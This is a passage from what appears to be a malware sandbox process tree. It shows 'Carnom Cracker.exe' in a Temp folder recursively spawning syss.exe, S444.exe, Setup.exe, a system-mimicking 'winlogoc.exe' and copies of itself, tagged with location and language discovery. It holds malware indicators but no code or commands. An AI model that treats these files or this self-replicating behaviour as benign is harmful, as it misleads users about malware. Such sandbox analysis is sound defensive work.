C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"36⤵PID:5540
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"37⤵PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"37⤵
- System Location Discovery: System Language Discovery
PID:1532
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"37⤵PID:2812
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"37⤵PID:5536
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"37⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5736 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"38⤵PID:1576
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"38⤵
- System Location Discovery: System Language Discovery
PID:4216
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"38⤵PID:5168
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"38⤵PID:3428
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"38⤵
- System Location Discovery: System Language Discovery
PID:752 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"39⤵PID:5716
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"39⤵PID:3288
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"39⤵PID:5648
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"39⤵PID:1084
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"39⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5552 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"40⤵PID:5300
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"40⤵PID:5164
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"40⤵PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"40⤵PID:3268
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"40⤵
- Checks computer location settings
PID:5972 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"41⤵PID:5676
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"41⤵PID:6140
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"41⤵PID:5156
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"41⤵PID:5840
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"41⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4776 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"42⤵PID:5712
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"42⤵PID:6072
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"42⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"42⤵PID:1608
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"42⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5808 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"43⤵PID:5844
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"43⤵PID:3256
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"43⤵PID:4796
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"43⤵PID:5488
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"43⤵
- Checks computer location settings
PID:6016 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"44⤵PID:3352
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"44⤵PID:2428
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"44⤵PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"44⤵PID:3928
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"44⤵
- Checks computer location settings
PID:4136 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"45⤵PID:2248
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"45⤵PID:2316
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"45⤵PID:5196
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"45⤵PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"45⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2288 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"46⤵PID:3332
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"46⤵PID:1472
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"46⤵PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"46⤵PID:5304
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"46⤵PID:5804
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"47⤵PID:2152
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"47⤵
- System Location Discovery: System Language Discovery
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"47⤵PID:5060
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"47⤵PID:5384
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"47⤵
- System Location Discovery: System Language Discovery
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"48⤵PID:5168
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"48⤵PID:5752
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"48⤵PID:2180
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"48⤵PID:5228
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"48⤵
- System Location Discovery: System Language Discovery
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"49⤵PID:4196
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"49⤵PID:5892
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"49⤵PID:1884
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"49⤵PID:4216
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"49⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5900 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"50⤵PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"50⤵PID:4856
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"50⤵PID:5944
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"50⤵PID:1416
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"50⤵PID:5888
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"51⤵PID:5280
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"51⤵
- System Location Discovery: System Language Discovery
PID:5580
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"51⤵PID:4136
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"51⤵PID:5776
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"51⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"52⤵PID:5748
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"52⤵PID:4792
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"52⤵PID:1084
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"52⤵PID:4756
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"52⤵
- Checks computer location settings
PID:5680 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"53⤵PID:6124
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"53⤵
- System Location Discovery: System Language Discovery
PID:5748
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"53⤵PID:5884
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"53⤵PID:3276
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"53⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"54⤵PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"54⤵
- System Location Discovery: System Language Discovery
PID:3788
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"54⤵PID:2208
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"54⤵PID:5680
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"54⤵PID:5596
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"55⤵PID:2504
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"55⤵PID:3456
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"55⤵PID:5268
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"55⤵PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"55⤵
- Checks computer location settings
PID:3044 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"56⤵PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"56⤵
- System Location Discovery: System Language Discovery
PID:3256
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"56⤵PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"56⤵PID:3716
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"56⤵
- Checks computer location settings
PID:6064 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"57⤵PID:1216
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"57⤵
- System Location Discovery: System Language Discovery
PID:4000
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"57⤵PID:1348
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"57⤵PID:4892
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"57⤵
- Checks computer location settings
PID:6128 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"58⤵PID:5644
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"58⤵PID:5656
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"58⤵PID:4176
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"58⤵PID:3240
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"58⤵PID:3268
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"59⤵PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"59⤵PID:3916
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"59⤵PID:6140
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"59⤵PID:3276
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"59⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"60⤵PID:5872
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"60⤵
- System Location Discovery: System Language Discovery
PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"60⤵PID:5888
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"60⤵PID:5240
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"60⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"61⤵PID:5404
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"61⤵PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"61⤵PID:3832
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"61⤵PID:824
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"61⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"62⤵PID:2812
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"62⤵PID:5680
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"62⤵PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"62⤵PID:5604
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"62⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"63⤵PID:3928
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"63⤵PID:1436
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"63⤵PID:5616
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"63⤵PID:4832
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"63⤵PID:5228
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"64⤵PID:5708
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"64⤵
- System Location Discovery: System Language Discovery
PID:5252
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"64⤵PID:5128
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"64⤵PID:4792
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"64⤵
- Checks computer location settings
PID:2288 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"65⤵PID:4916
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"65⤵PID:3864
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"65⤵PID:1628
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"65⤵PID:2016
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"65⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5488 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"66⤵PID:6128
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"66⤵
- System Location Discovery: System Language Discovery
PID:6076
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"66⤵PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"66⤵PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"66⤵
- System Location Discovery: System Language Discovery
PID:5364 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"67⤵PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"67⤵PID:3552
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"67⤵PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"67⤵PID:6064
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"67⤵
- Checks computer location settings
PID:5332 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"68⤵PID:5804
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"68⤵PID:5404
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"68⤵PID:5124
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"68⤵PID:4176
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"68⤵
- Checks computer location settings
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"69⤵PID:532
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"69⤵PID:2424
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"69⤵PID:5488
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"69⤵PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"69⤵
- Checks computer location settings
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"70⤵PID:60
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"70⤵
- System Location Discovery: System Language Discovery
PID:5712
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"70⤵PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"70⤵PID:1488
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"70⤵
- Checks computer location settings
PID:5876 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"71⤵PID:3844
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"71⤵
- System Location Discovery: System Language Discovery
PID:4060
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"71⤵PID:5772
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"71⤵PID:5744
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"71⤵
- Checks computer location settings
PID:2208 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"72⤵PID:952
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"72⤵
- System Location Discovery: System Language Discovery
PID:1764
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"72⤵PID:2536
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"72⤵PID:824
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"72⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:752 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"73⤵PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"73⤵
- System Location Discovery: System Language Discovery
PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"73⤵PID:3424
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"73⤵PID:244
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"73⤵
- Checks computer location settings
PID:5684 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"74⤵PID:3508
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"74⤵PID:5320
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"74⤵PID:4972
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"74⤵PID:4792
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"74⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5384 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"75⤵PID:1216
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"75⤵PID:4612
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"75⤵PID:1608
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"75⤵PID:5548
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"75⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"76⤵PID:5560
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"76⤵
